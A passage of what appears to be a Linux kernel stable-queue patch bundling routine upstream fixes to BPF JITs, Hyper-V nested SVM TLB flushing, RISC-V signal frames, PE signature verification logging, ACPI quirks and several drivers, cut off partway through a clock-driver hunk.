+diff --git a/arch/arm64/net/bpf_jit_comp.c b/arch/arm64/net/bpf_jit_comp.c
+index 30f76178608b3..8f16217c111c8 100644
+--- a/arch/arm64/net/bpf_jit_comp.c
++++ b/arch/arm64/net/bpf_jit_comp.c
+@@ -1905,7 +1905,8 @@ static int prepare_trampoline(struct jit_ctx *ctx, struct bpf_tramp_image *im,
+ 		restore_args(ctx, args_off, nargs);
+ 		/* call original func */
+ 		emit(A64_LDR64I(A64_R(10), A64_SP, retaddr_off), ctx);
+-		emit(A64_BLR(A64_R(10)), ctx);
++		emit(A64_ADR(A64_LR, AARCH64_INSN_SIZE * 2), ctx);
++		emit(A64_RET(A64_R(10)), ctx);
+ 		/* store return value */
+ 		emit(A64_STR64I(A64_R(0), A64_SP, retval_off), ctx);
+ 		/* reserve a nop for bpf_tramp_image_put */
+diff --git a/arch/loongarch/net/bpf_jit.c b/arch/loongarch/net/bpf_jit.c
+index 2467bfb8889a9..82b4402810da0 100644
+--- a/arch/loongarch/net/bpf_jit.c
++++ b/arch/loongarch/net/bpf_jit.c
+@@ -955,6 +955,10 @@ static int build_insn(const struct bpf_insn *insn, struct jit_ctx *ctx, bool ext
+ 		emit_atomic(insn, ctx);
+ 		break;
+ 
++	/* Speculation barrier */
++	case BPF_ST | BPF_NOSPEC:
++		break;
++
+ 	default:
+ 		pr_err("bpf_jit: unknown opcode %02x\n", code);
+ 		return -EINVAL;
+diff --git a/arch/powerpc/mm/numa.c b/arch/powerpc/mm/numa.c
+index b44ce71917d75..16cfe56be05bb 100644
+--- a/arch/powerpc/mm/numa.c
++++ b/arch/powerpc/mm/numa.c
+@@ -366,6 +366,7 @@ void update_numa_distance(struct device_node *node)
+ 	WARN(numa_distance_table[nid][nid] == -1,
+ 	     "NUMA distance details for node %d not provided\n", nid);
+ }
++EXPORT_SYMBOL_GPL(update_numa_distance);
+ 
+ /*
+  * ibm,numa-lookup-index-table= {N, domainid1, domainid2, ..... domainidN}
+diff --git a/arch/powerpc/platforms/pseries/papr_scm.c b/arch/powerpc/platforms/pseries/papr_scm.c
+index 2f8385523a132..1a53e048ceb76 100644
+--- a/arch/powerpc/platforms/pseries/papr_scm.c
++++ b/arch/powerpc/platforms/pseries/papr_scm.c
+@@ -1428,6 +1428,13 @@ static int papr_scm_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
++	/*
++	 * open firmware platform device create won't update the NUMA 
++	 * distance table. For PAPR SCM devices we use numa_map_to_online_node()
++	 * to find the nearest online NUMA node and that requires correct
++	 * distance table information.
++	 */
++	update_numa_distance(dn);
+ 
+ 	p = kzalloc(sizeof(*p), GFP_KERNEL);
+ 	if (!p)
+diff --git a/arch/riscv/kernel/signal.c b/arch/riscv/kernel/signal.c
+index bfb2afa4135f8..dee66c9290cce 100644
+--- a/arch/riscv/kernel/signal.c
++++ b/arch/riscv/kernel/signal.c
+@@ -19,6 +19,7 @@
+ #include <asm/signal32.h>
+ #include <asm/switch_to.h>
+ #include <asm/csr.h>
++#include <asm/cacheflush.h>
+ 
+ extern u32 __user_rt_sigreturn[2];
+ 
+@@ -181,6 +182,7 @@ static int setup_rt_frame(struct ksignal *ksig, sigset_t *set,
+ {
+ 	struct rt_sigframe __user *frame;
+ 	long err = 0;
++	unsigned long __maybe_unused addr;
+ 
+ 	frame = get_sigframe(ksig, regs, sizeof(*frame));
+ 	if (!access_ok(frame, sizeof(*frame)))
+@@ -209,7 +211,12 @@ static int setup_rt_frame(struct ksignal *ksig, sigset_t *set,
+ 	if (copy_to_user(&frame->sigreturn_code, __user_rt_sigreturn,
+ 			 sizeof(frame->sigreturn_code)))
+ 		return -EFAULT;
+-	regs->ra = (unsigned long)&frame->sigreturn_code;
++
++	addr = (unsigned long)&frame->sigreturn_code;
++	/* Make sure the two instructions are pushed to icache. */
++	flush_icache_range(addr, addr + sizeof(frame->sigreturn_code));
++
++	regs->ra = addr;
+ #endif /* CONFIG_MMU */
+ 
+ 	/*
+diff --git a/arch/x86/include/asm/hyperv-tlfs.h b/arch/x86/include/asm/hyperv-tlfs.h
+index 3089ec352743b..c5e0e5a06c0dc 100644
+--- a/arch/x86/include/asm/hyperv-tlfs.h
++++ b/arch/x86/include/asm/hyperv-tlfs.h
+@@ -598,6 +598,28 @@ struct hv_enlightened_vmcs {
+ 
+ #define HV_VMX_ENLIGHTENED_CLEAN_FIELD_ALL			0xFFFF
+ 
++/*
++ * Hyper-V uses the software reserved 32 bytes in VMCB control area to expose
++ * SVM enlightenments to guests.
++ */
++struct hv_vmcb_enlightenments {
++	struct __packed hv_enlightenments_control {
++		u32 nested_flush_hypercall:1;
++		u32 msr_bitmap:1;
++		u32 enlightened_npt_tlb: 1;
++		u32 reserved:29;
++	} __packed hv_enlightenments_control;
++	u32 hv_vp_id;
++	u64 hv_vm_id;
++	u64 partition_assist_page;
++	u64 reserved;
++} __packed;
++
++/*
++ * Hyper-V uses the software reserved clean bit in VMCB.
++ */
++#define HV_VMCB_NESTED_ENLIGHTENMENTS		31
++
+ struct hv_partition_assist_pg {
+ 	u32 tlb_lock_count;
+ };
+diff --git a/arch/x86/include/asm/svm.h b/arch/x86/include/asm/svm.h
+index 236fda748ae96..02aac78cb21d4 100644
+--- a/arch/x86/include/asm/svm.h
++++ b/arch/x86/include/asm/svm.h
+@@ -5,6 +5,8 @@
+ #include <uapi/asm/svm.h>
+ #include <uapi/asm/kvm.h>
+ 
++#include <asm/hyperv-tlfs.h>
++
+ /*
+  * 32-bit intercept words in the VMCB Control Area, starting
+  * at Byte offset 000h.
+@@ -161,7 +163,10 @@ struct __attribute__ ((__packed__)) vmcb_control_area {
+ 	 * Offset 0x3e0, 32 bytes reserved
+ 	 * for use by hypervisor/software.
+ 	 */
+-	u8 reserved_sw[32];
++	union {
++		struct hv_vmcb_enlightenments hv_enlightenments;
++		u8 reserved_sw[32];
++	};
+ };
+ 
+ 
+diff --git a/arch/x86/kernel/x86_init.c b/arch/x86/kernel/x86_init.c
+index ef80d361b4632..10622cf2b30f4 100644
+--- a/arch/x86/kernel/x86_init.c
++++ b/arch/x86/kernel/x86_init.c
+@@ -33,8 +33,8 @@ static int __init iommu_init_noop(void) { return 0; }
+ static void iommu_shutdown_noop(void) { }
+ bool __init bool_x86_init_noop(void) { return false; }
+ void x86_op_int_noop(int cpu) { }
+-static __init int set_rtc_noop(const struct timespec64 *now) { return -EINVAL; }
+-static __init void get_rtc_noop(struct timespec64 *now) { }
++static int set_rtc_noop(const struct timespec64 *now) { return -EINVAL; }
++static void get_rtc_noop(struct timespec64 *now) { }
+ 
+ static __initconst const struct of_device_id of_cmos_match[] = {
+ 	{ .compatible = "motorola,mc146818" },
+diff --git a/arch/x86/kvm/kvm_onhyperv.h b/arch/x86/kvm/kvm_onhyperv.h
+index 287e98ef9df3d..6272dabec02da 100644
+--- a/arch/x86/kvm/kvm_onhyperv.h
++++ b/arch/x86/kvm/kvm_onhyperv.h
+@@ -12,6 +12,11 @@ int hv_remote_flush_tlb_with_range(struct kvm *kvm,
+ int hv_remote_flush_tlb(struct kvm *kvm);
+ void hv_track_root_tdp(struct kvm_vcpu *vcpu, hpa_t root_tdp);
+ #else /* !CONFIG_HYPERV */
++static inline int hv_remote_flush_tlb(struct kvm *kvm)
++{
++	return -EOPNOTSUPP;
++}
++
+ static inline void hv_track_root_tdp(struct kvm_vcpu *vcpu, hpa_t root_tdp)
+ {
+ }
+diff --git a/arch/x86/kvm/svm/hyperv.h b/arch/x86/kvm/svm/hyperv.h
+index 7d6d97968fb98..c59544cdf03b7 100644
+--- a/arch/x86/kvm/svm/hyperv.h
++++ b/arch/x86/kvm/svm/hyperv.h
+@@ -10,26 +10,4 @@
+ 
+ #include "../hyperv.h"
+ 
+-/*
+- * Hyper-V uses the software reserved 32 bytes in VMCB
+- * control area to expose SVM enlightenments to guests.
+- */
+-struct hv_enlightenments {
+-	struct __packed hv_enlightenments_control {
+-		u32 nested_flush_hypercall:1;
+-		u32 msr_bitmap:1;
+-		u32 enlightened_npt_tlb: 1;
+-		u32 reserved:29;
+-	} __packed hv_enlightenments_control;
+-	u32 hv_vp_id;
+-	u64 hv_vm_id;
+-	u64 partition_assist_page;
+-	u64 reserved;
+-} __packed;
+-
+-/*
+- * Hyper-V uses the software reserved clean bit in VMCB
+- */
+-#define VMCB_HV_NESTED_ENLIGHTENMENTS VMCB_SW
+-
+ #endif /* __ARCH_X86_KVM_SVM_HYPERV_H__ */
+diff --git a/arch/x86/kvm/svm/nested.c b/arch/x86/kvm/svm/nested.c
+index 995bc0f907591..92268645a5fed 100644
+--- a/arch/x86/kvm/svm/nested.c
++++ b/arch/x86/kvm/svm/nested.c
+@@ -179,8 +179,7 @@ void recalc_intercepts(struct vcpu_svm *svm)
+  */
+ static bool nested_svm_vmrun_msrpm(struct vcpu_svm *svm)
+ {
+-	struct hv_enlightenments *hve =
+-		(struct hv_enlightenments *)svm->nested.ctl.reserved_sw;
++	struct hv_vmcb_enlightenments *hve = &svm->nested.ctl.hv_enlightenments;
+ 	int i;
+ 
+ 	/*
+@@ -194,7 +193,7 @@ static bool nested_svm_vmrun_msrpm(struct vcpu_svm *svm)
+ 	if (!svm->nested.force_msr_bitmap_recalc &&
+ 	    kvm_hv_hypercall_enabled(&svm->vcpu) &&
+ 	    hve->hv_enlightenments_control.msr_bitmap &&
+-	    (svm->nested.ctl.clean & BIT(VMCB_HV_NESTED_ENLIGHTENMENTS)))
++	    (svm->nested.ctl.clean & BIT(HV_VMCB_NESTED_ENLIGHTENMENTS)))
+ 		goto set_msrpm_base_pa;
+ 
+ 	if (!(vmcb12_is_intercept(&svm->nested.ctl, INTERCEPT_MSR_PROT)))
+@@ -369,8 +368,8 @@ void __nested_copy_vmcb_control_to_cache(struct kvm_vcpu *vcpu,
+ 	/* Hyper-V extensions (Enlightened VMCB) */
+ 	if (kvm_hv_hypercall_enabled(vcpu)) {
+ 		to->clean = from->clean;
+-		memcpy(to->reserved_sw, from->reserved_sw,
+-		       sizeof(struct hv_enlightenments));
++		memcpy(&to->hv_enlightenments, &from->hv_enlightenments,
++		       sizeof(to->hv_enlightenments));
+ 	}
+ }
+ 
+@@ -1485,7 +1484,7 @@ static void nested_copy_vmcb_cache_to_control(struct vmcb_control_area *dst,
+ 	dst->virt_ext              = from->virt_ext;
+ 	dst->pause_filter_count   = from->pause_filter_count;
+ 	dst->pause_filter_thresh  = from->pause_filter_thresh;
+-	/* 'clean' and 'reserved_sw' are not changed by KVM */
++	/* 'clean' and 'hv_enlightenments' are not changed by KVM */
+ }
+ 
+ static int svm_get_nested_state(struct kvm_vcpu *vcpu,
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 3629dd979667c..9599931c7d572 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -3719,7 +3719,7 @@ static void svm_enable_nmi_window(struct kvm_vcpu *vcpu)
+ 	svm->vmcb->save.rflags |= (X86_EFLAGS_TF | X86_EFLAGS_RF);
+ }
+ 
+-static void svm_flush_tlb_current(struct kvm_vcpu *vcpu)
++static void svm_flush_tlb_asid(struct kvm_vcpu *vcpu)
+ {
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+ 
+@@ -3736,6 +3736,37 @@ static void svm_flush_tlb_current(struct kvm_vcpu *vcpu)
+ 		svm->current_vmcb->asid_generation--;
+ }
+ 
++static void svm_flush_tlb_current(struct kvm_vcpu *vcpu)
++{
++	hpa_t root_tdp = vcpu->arch.mmu->root.hpa;
++
++	/*
++	 * When running on Hyper-V with EnlightenedNptTlb enabled, explicitly
++	 * flush the NPT mappings via hypercall as flushing the ASID only
++	 * affects virtual to physical mappings, it does not invalidate guest
++	 * physical to host physical mappings.
++	 */
++	if (svm_hv_is_enlightened_tlb_enabled(vcpu) && VALID_PAGE(root_tdp))
++		hyperv_flush_guest_mapping(root_tdp);
++
++	svm_flush_tlb_asid(vcpu);
++}
++
++static void svm_flush_tlb_all(struct kvm_vcpu *vcpu)
++{
++	/*
++	 * When running on Hyper-V with EnlightenedNptTlb enabled, remote TLB
++	 * flushes should be routed to hv_remote_flush_tlb() without requesting
++	 * a "regular" remote flush.  Reaching this point means either there's
++	 * a KVM bug or a prior hv_remote_flush_tlb() call failed, both of
++	 * which might be fatal to the guest.  Yell, but try to recover.
++	 */
++	if (WARN_ON_ONCE(svm_hv_is_enlightened_tlb_enabled(vcpu)))
++		hv_remote_flush_tlb(vcpu->kvm);
++
++	svm_flush_tlb_asid(vcpu);
++}
++
+ static void svm_flush_tlb_gva(struct kvm_vcpu *vcpu, gva_t gva)
+ {
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+@@ -4733,10 +4764,10 @@ static struct kvm_x86_ops svm_x86_ops __initdata = {
+ 	.set_rflags = svm_set_rflags,
+ 	.get_if_flag = svm_get_if_flag,
+ 
+-	.flush_tlb_all = svm_flush_tlb_current,
++	.flush_tlb_all = svm_flush_tlb_all,
+ 	.flush_tlb_current = svm_flush_tlb_current,
+ 	.flush_tlb_gva = svm_flush_tlb_gva,
+-	.flush_tlb_guest = svm_flush_tlb_current,
++	.flush_tlb_guest = svm_flush_tlb_asid,
+ 
+ 	.vcpu_pre_run = svm_vcpu_pre_run,
+ 	.vcpu_run = svm_vcpu_run,
+diff --git a/arch/x86/kvm/svm/svm.h b/arch/x86/kvm/svm/svm.h
+index bbc061f3a2b37..d0ed3f5952295 100644
+--- a/arch/x86/kvm/svm/svm.h
++++ b/arch/x86/kvm/svm/svm.h
+@@ -151,7 +151,10 @@ struct vmcb_ctrl_area_cached {
+ 	u64 nested_cr3;
+ 	u64 virt_ext;
+ 	u32 clean;
+-	u8 reserved_sw[32];
++	union {
++		struct hv_vmcb_enlightenments hv_enlightenments;
++		u8 reserved_sw[32];
++	};
+ };
+ 
+ struct svm_nested_state {
+diff --git a/arch/x86/kvm/svm/svm_onhyperv.c b/arch/x86/kvm/svm/svm_onhyperv.c
+index 8cdc62c74a964..52c73a8be72b1 100644
+--- a/arch/x86/kvm/svm/svm_onhyperv.c
++++ b/arch/x86/kvm/svm/svm_onhyperv.c
+@@ -16,7 +16,7 @@
+ 
+ int svm_hv_enable_direct_tlbflush(struct kvm_vcpu *vcpu)
+ {
+-	struct hv_enlightenments *hve;
++	struct hv_vmcb_enlightenments *hve;
+ 	struct hv_partition_assist_pg **p_hv_pa_pg =
+ 			&to_kvm_hv(vcpu->kvm)->hv_pa_pg;
+ 
+@@ -26,13 +26,13 @@ int svm_hv_enable_direct_tlbflush(struct kvm_vcpu *vcpu)
+ 	if (!*p_hv_pa_pg)
+ 		return -ENOMEM;
+ 
+-	hve = (struct hv_enlightenments *)to_svm(vcpu)->vmcb->control.reserved_sw;
++	hve = &to_svm(vcpu)->vmcb->control.hv_enlightenments;
+ 
+ 	hve->partition_assist_page = __pa(*p_hv_pa_pg);
+ 	hve->hv_vm_id = (unsigned long)vcpu->kvm;
+ 	if (!hve->hv_enlightenments_control.nested_flush_hypercall) {
+ 		hve->hv_enlightenments_control.nested_flush_hypercall = 1;
+-		vmcb_mark_dirty(to_svm(vcpu)->vmcb, VMCB_HV_NESTED_ENLIGHTENMENTS);
++		vmcb_mark_dirty(to_svm(vcpu)->vmcb, HV_VMCB_NESTED_ENLIGHTENMENTS);
+ 	}
+ 
+ 	return 0;
+diff --git a/arch/x86/kvm/svm/svm_onhyperv.h b/arch/x86/kvm/svm/svm_onhyperv.h
+index 4387173576d5e..9a6a34149919c 100644
+--- a/arch/x86/kvm/svm/svm_onhyperv.h
++++ b/arch/x86/kvm/svm/svm_onhyperv.h
+@@ -6,6 +6,8 @@
+ #ifndef __ARCH_X86_KVM_SVM_ONHYPERV_H__
+ #define __ARCH_X86_KVM_SVM_ONHYPERV_H__
+ 
++#include <asm/mshyperv.h>
++
+ #if IS_ENABLED(CONFIG_HYPERV)
+ 
+ #include "kvm_onhyperv.h"
+@@ -15,10 +17,20 @@ static struct kvm_x86_ops svm_x86_ops;
+ 
+ int svm_hv_enable_direct_tlbflush(struct kvm_vcpu *vcpu);
+ 
++static inline bool svm_hv_is_enlightened_tlb_enabled(struct kvm_vcpu *vcpu)
++{
++	struct hv_vmcb_enlightenments *hve = &to_svm(vcpu)->vmcb->control.hv_enlightenments;
++
++	return ms_hyperv.nested_features & HV_X64_NESTED_ENLIGHTENED_TLB &&
++	       !!hve->hv_enlightenments_control.enlightened_npt_tlb;
++}
++
+ static inline void svm_hv_init_vmcb(struct vmcb *vmcb)
+ {
+-	struct hv_enlightenments *hve =
+-		(struct hv_enlightenments *)vmcb->control.reserved_sw;
++	struct hv_vmcb_enlightenments *hve = &vmcb->control.hv_enlightenments;
++
++	BUILD_BUG_ON(sizeof(vmcb->control.hv_enlightenments) !=
++		     sizeof(vmcb->control.reserved_sw));
+ 
+ 	if (npt_enabled &&
+ 	    ms_hyperv.nested_features & HV_X64_NESTED_ENLIGHTENED_TLB)
+@@ -60,27 +72,29 @@ static inline void svm_hv_vmcb_dirty_nested_enlightenments(
+ 		struct kvm_vcpu *vcpu)
+ {
+ 	struct vmcb *vmcb = to_svm(vcpu)->vmcb;
+-	struct hv_enlightenments *hve =
+-		(struct hv_enlightenments *)vmcb->control.reserved_sw;
++	struct hv_vmcb_enlightenments *hve = &vmcb->control.hv_enlightenments;
+ 
+ 	if (hve->hv_enlightenments_control.msr_bitmap)
+-		vmcb_mark_dirty(vmcb, VMCB_HV_NESTED_ENLIGHTENMENTS);
++		vmcb_mark_dirty(vmcb, HV_VMCB_NESTED_ENLIGHTENMENTS);
+ }
+ 
+-static inline void svm_hv_update_vp_id(struct vmcb *vmcb,
+-		struct kvm_vcpu *vcpu)
++static inline void svm_hv_update_vp_id(struct vmcb *vmcb, struct kvm_vcpu *vcpu)
+ {
+-	struct hv_enlightenments *hve =
+-		(struct hv_enlightenments *)vmcb->control.reserved_sw;
++	struct hv_vmcb_enlightenments *hve = &vmcb->control.hv_enlightenments;
+ 	u32 vp_index = kvm_hv_get_vpindex(vcpu);
+ 
+ 	if (hve->hv_vp_id != vp_index) {
+ 		hve->hv_vp_id = vp_index;
+-		vmcb_mark_dirty(vmcb, VMCB_HV_NESTED_ENLIGHTENMENTS);
++		vmcb_mark_dirty(vmcb, HV_VMCB_NESTED_ENLIGHTENMENTS);
+ 	}
+ }
+ #else
+ 
++static inline bool svm_hv_is_enlightened_tlb_enabled(struct kvm_vcpu *vcpu)
++{
++	return false;
++}
++
+ static inline void svm_hv_init_vmcb(struct vmcb *vmcb)
+ {
+ }
+diff --git a/arch/x86/pci/fixup.c b/arch/x86/pci/fixup.c
+index 615a76d700194..bf5161dcf89e7 100644
+--- a/arch/x86/pci/fixup.c
++++ b/arch/x86/pci/fixup.c
+@@ -7,6 +7,7 @@
+ #include <linux/dmi.h>
+ #include <linux/pci.h>
+ #include <linux/vgaarb.h>
++#include <asm/amd_nb.h>
+ #include <asm/hpet.h>
+ #include <asm/pci_x86.h>
+ 
+@@ -824,3 +825,23 @@ static void rs690_fix_64bit_dma(struct pci_dev *pdev)
+ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI, 0x7910, rs690_fix_64bit_dma);
+ 
+ #endif
++
++#ifdef CONFIG_AMD_NB
++
++#define AMD_15B8_RCC_DEV2_EPF0_STRAP2                                  0x10136008
++#define AMD_15B8_RCC_DEV2_EPF0_STRAP2_NO_SOFT_RESET_DEV2_F0_MASK       0x00000080L
++
++static void quirk_clear_strap_no_soft_reset_dev2_f0(struct pci_dev *dev)
++{
++	u32 data;
++
++	if (!amd_smn_read(0, AMD_15B8_RCC_DEV2_EPF0_STRAP2, &data)) {
++		data &= ~AMD_15B8_RCC_DEV2_EPF0_STRAP2_NO_SOFT_RESET_DEV2_F0_MASK;
++		if (amd_smn_write(0, AMD_15B8_RCC_DEV2_EPF0_STRAP2, data))
++			pci_err(dev, "Failed to write data 0x%x\n", data);
++	} else {
++		pci_err(dev, "Failed to read data\n");
++	}
++}
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_AMD, 0x15b8, quirk_clear_strap_no_soft_reset_dev2_f0);
++#endif
+diff --git a/crypto/asymmetric_keys/pkcs7_verify.c b/crypto/asymmetric_keys/pkcs7_verify.c
+index f6321c785714c..3da32813e4412 100644
+--- a/crypto/asymmetric_keys/pkcs7_verify.c
++++ b/crypto/asymmetric_keys/pkcs7_verify.c
+@@ -79,16 +79,16 @@ static int pkcs7_digest(struct pkcs7_message *pkcs7,
+ 		}
+ 
+ 		if (sinfo->msgdigest_len != sig->digest_size) {
+-			pr_debug("Sig %u: Invalid digest size (%u)\n",
+-				 sinfo->index, sinfo->msgdigest_len);
++			pr_warn("Sig %u: Invalid digest size (%u)\n",
++				sinfo->index, sinfo->msgdigest_len);
+ 			ret = -EBADMSG;
+ 			goto error;
+ 		}
+ 
+ 		if (memcmp(sig->digest, sinfo->msgdigest,
+ 			   sinfo->msgdigest_len) != 0) {
+-			pr_debug("Sig %u: Message digest doesn't match\n",
+-				 sinfo->index);
++			pr_warn("Sig %u: Message digest doesn't match\n",
++				sinfo->index);
+ 			ret = -EKEYREJECTED;
+ 			goto error;
+ 		}
+@@ -478,7 +478,7 @@ int pkcs7_supply_detached_data(struct pkcs7_message *pkcs7,
+ 			       const void *data, size_t datalen)
+ {
+ 	if (pkcs7->data) {
+-		pr_debug("Data already supplied\n");
++		pr_warn("Data already supplied\n");
+ 		return -EINVAL;
+ 	}
+ 	pkcs7->data = data;
+diff --git a/crypto/asymmetric_keys/verify_pefile.c b/crypto/asymmetric_keys/verify_pefile.c
+index 7553ab18db898..22beaf2213a22 100644
+--- a/crypto/asymmetric_keys/verify_pefile.c
++++ b/crypto/asymmetric_keys/verify_pefile.c
+@@ -74,7 +74,7 @@ static int pefile_parse_binary(const void *pebuf, unsigned int pelen,
+ 		break;
+ 
+ 	default:
+-		pr_debug("Unknown PEOPT magic = %04hx\n", pe32->magic);
++		pr_warn("Unknown PEOPT magic = %04hx\n", pe32->magic);
+ 		return -ELIBBAD;
+ 	}
+ 
+@@ -95,7 +95,7 @@ static int pefile_parse_binary(const void *pebuf, unsigned int pelen,
+ 	ctx->certs_size = ddir->certs.size;
+ 
+ 	if (!ddir->certs.virtual_address || !ddir->certs.size) {
+-		pr_debug("Unsigned PE binary\n");
++		pr_warn("Unsigned PE binary\n");
+ 		return -ENODATA;
+ 	}
+ 
+@@ -127,7 +127,7 @@ static int pefile_strip_sig_wrapper(const void *pebuf,
+ 	unsigned len;
+ 
+ 	if (ctx->sig_len < sizeof(wrapper)) {
+-		pr_debug("Signature wrapper too short\n");
++		pr_warn("Signature wrapper too short\n");
+ 		return -ELIBBAD;
+ 	}
+ 
+@@ -135,19 +135,23 @@ static int pefile_strip_sig_wrapper(const void *pebuf,
+ 	pr_debug("sig wrapper = { %x, %x, %x }\n",
+ 		 wrapper.length, wrapper.revision, wrapper.cert_type);
+ 
+-	/* Both pesign and sbsign round up the length of certificate table
+-	 * (in optional header data directories) to 8 byte alignment.
++	/* sbsign rounds up the length of certificate table (in optional
++	 * header data directories) to 8 byte alignment.  However, the PE
++	 * specification states that while entries are 8-byte aligned, this is
++	 * not included in their length, and as a result, pesign has not
++	 * rounded up since 0.110.
+ 	 */
+-	if (round_up(wrapper.length, 8) != ctx->sig_len) {
+-		pr_debug("Signature wrapper len wrong\n");
++	if (wrapper.length > ctx->sig_len) {
++		pr_warn("Signature wrapper bigger than sig len (%x > %x)\n",
++			ctx->sig_len, wrapper.length);
+ 		return -ELIBBAD;
+ 	}
+ 	if (wrapper.revision != WIN_CERT_REVISION_2_0) {
+-		pr_debug("Signature is not revision 2.0\n");
++		pr_warn("Signature is not revision 2.0\n");
+ 		return -ENOTSUPP;
+ 	}
+ 	if (wrapper.cert_type != WIN_CERT_TYPE_PKCS_SIGNED_DATA) {
+-		pr_debug("Signature certificate type is not PKCS\n");
++		pr_warn("Signature certificate type is not PKCS\n");
+ 		return -ENOTSUPP;
+ 	}
+ 
+@@ -160,7 +164,7 @@ static int pefile_strip_sig_wrapper(const void *pebuf,
+ 	ctx->sig_offset += sizeof(wrapper);
+ 	ctx->sig_len -= sizeof(wrapper);
+ 	if (ctx->sig_len < 4) {
+-		pr_debug("Signature data missing\n");
++		pr_warn("Signature data missing\n");
+ 		return -EKEYREJECTED;
+ 	}
+ 
+@@ -194,7 +198,7 @@ check_len:
+ 		return 0;
+ 	}
+ not_pkcs7:
+-	pr_debug("Signature data not PKCS#7\n");
++	pr_warn("Signature data not PKCS#7\n");
+ 	return -ELIBBAD;
+ }
+ 
+@@ -337,8 +341,8 @@ static int pefile_digest_pe(const void *pebuf, unsigned int pelen,
+ 	digest_size = crypto_shash_digestsize(tfm);
+ 
+ 	if (digest_size != ctx->digest_len) {
+-		pr_debug("Digest size mismatch (%zx != %x)\n",
+-			 digest_size, ctx->digest_len);
++		pr_warn("Digest size mismatch (%zx != %x)\n",
++			digest_size, ctx->digest_len);
+ 		ret = -EBADMSG;
+ 		goto error_no_desc;
+ 	}
+@@ -369,7 +373,7 @@ static int pefile_digest_pe(const void *pebuf, unsigned int pelen,
+ 	 * PKCS#7 certificate.
+ 	 */
+ 	if (memcmp(digest, ctx->digest, ctx->digest_len) != 0) {
+-		pr_debug("Digest mismatch\n");
++		pr_warn("Digest mismatch\n");
+ 		ret = -EKEYREJECTED;
+ 	} else {
+ 		pr_debug("The digests match!\n");
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index a222bda7e15b0..d08818baea88f 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -400,6 +400,13 @@ static const struct dmi_system_id medion_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "M17T"),
+ 		},
+ 	},
++	{
++		.ident = "MEDION S17413",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "MEDION"),
++			DMI_MATCH(DMI_BOARD_NAME, "M1xA"),
++		},
++	},
+ 	{ }
+ };
+ 
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 42b5af5490a11..f0f41959faea6 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -530,6 +530,14 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Precision 7510"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_native,
++	 /* Acer Aspire 3830TG */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Acer"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "Aspire 3830TG"),
++		},
++	},
+ 	{
+ 	 .callback = video_detect_force_native,
+ 	 /* Acer Aspire 4810T */
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 2ed994a313a91..c0cbc5f3eb266 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -1571,17 +1571,18 @@ static int ublk_ctrl_start_dev(struct io_uring_cmd *cmd)
+ 		set_bit(GD_SUPPRESS_PART_SCAN, &disk->state);
+ 
+ 	get_device(&ub->cdev_dev);
++	ub->dev_info.state = UBLK_S_DEV_LIVE;
+ 	ret = add_disk(disk);
+ 	if (ret) {
+ 		/*
+ 		 * Has to drop the reference since ->free_disk won't be
+ 		 * called in case of add_disk failure.
+ 		 */
++		ub->dev_info.state = UBLK_S_DEV_DEAD;
+ 		ublk_put_device(ub);
+ 		goto out_put_disk;
+ 	}
+ 	set_bit(UB_STATE_USED, &ub->state);
+-	ub->dev_info.state = UBLK_S_DEV_LIVE;
+ out_put_disk:
+ 	if (ret)
+ 		put_disk(disk);
+diff --git a/drivers/bluetooth/btbcm.c b/drivers/bluetooth/btbcm.c
+index 3006e2a0f37e1..43e98a598bd9a 100644
+--- a/drivers/bluetooth/btbcm.c
++++ b/drivers/bluetooth/btbcm.c
+@@ -511,7 +511,7 @@ static const char *btbcm_get_board_name(struct device *dev)
+ 	len = strlen(tmp) + 1;
+ 	board_type = devm_kzalloc(dev, len, GFP_KERNEL);
+ 	strscpy(board_type, tmp, len);
+-	for (i = 0; i < board_type[i]; i++) {
++	for (i = 0; i < len; i++) {
+ 		if (board_type[i] == '/')
+ 			board_type[i] = '-';
+ 	}
+diff --git a/drivers/clk/clk-renesas-pcie.c b/drivers/clk/clk-renesas-pcie.c
+index e6247141d0c05..3e98a16eba6bb 100644
+--- a/drivers/clk/clk-renesas-pcie.c
++++ b/drivers/clk/clk-renesas-pcie.c
+@@ -144,8 +144,9 @@ static int rs9_regmap_i2c_read(void *context,
+ static const struct regmap_config rs9_regmap_config = {
+ 	.reg_bits = 8,
+ 	.val_bits = 8,
+-	.cache_type = REGCACHE_NONE,
++	.cache_type = REGCACHE_FLAT,
+ 	.max_register = RS9_REG_BCP,
++	.num_reg_defaults_raw = 0x8,
+ 	.rd_table = &rs9_readable_table,
+ 	.wr_table = &rs9_writeable_table,
+ 	.reg_write = rs9_regmap_i2c_write,
+diff --git a/drivers/clk/sprd/common.c b/drivers/clk/sprd/common.c
+index ce81e4087a8fc..2bfbab8db94bf 100644
+--- a/drivers/clk/sprd/common.c
++++ b/drivers/clk/sprd/common.c
+@@ -17,7 +17,6 @@ static const struct regmap_config sprdclk_regmap_config = {
+ 	.reg_bits	= 32,
+ 	.reg_stride	= 4,
+ 	.val_bits	= 32,
+-	.max_register	= 0xffff,
+ 	.fast_io	= true,
+ };
+ 
+@@ -43,6 +42,8 @@ int sprd_clk_regmap_init(struct platform_device *pdev,
+ 	struct device *dev = &pdev->dev;
+ 	struct device_node *node = dev->of_node, *np;
+ 	struct regmap *regmap;
++	struct resource *res;
